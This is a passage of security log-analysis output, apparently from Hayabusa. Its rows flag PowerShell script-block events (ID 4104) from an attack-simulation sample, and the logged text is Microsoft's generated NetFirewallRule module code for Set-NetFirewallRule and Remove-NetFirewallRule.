'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] 
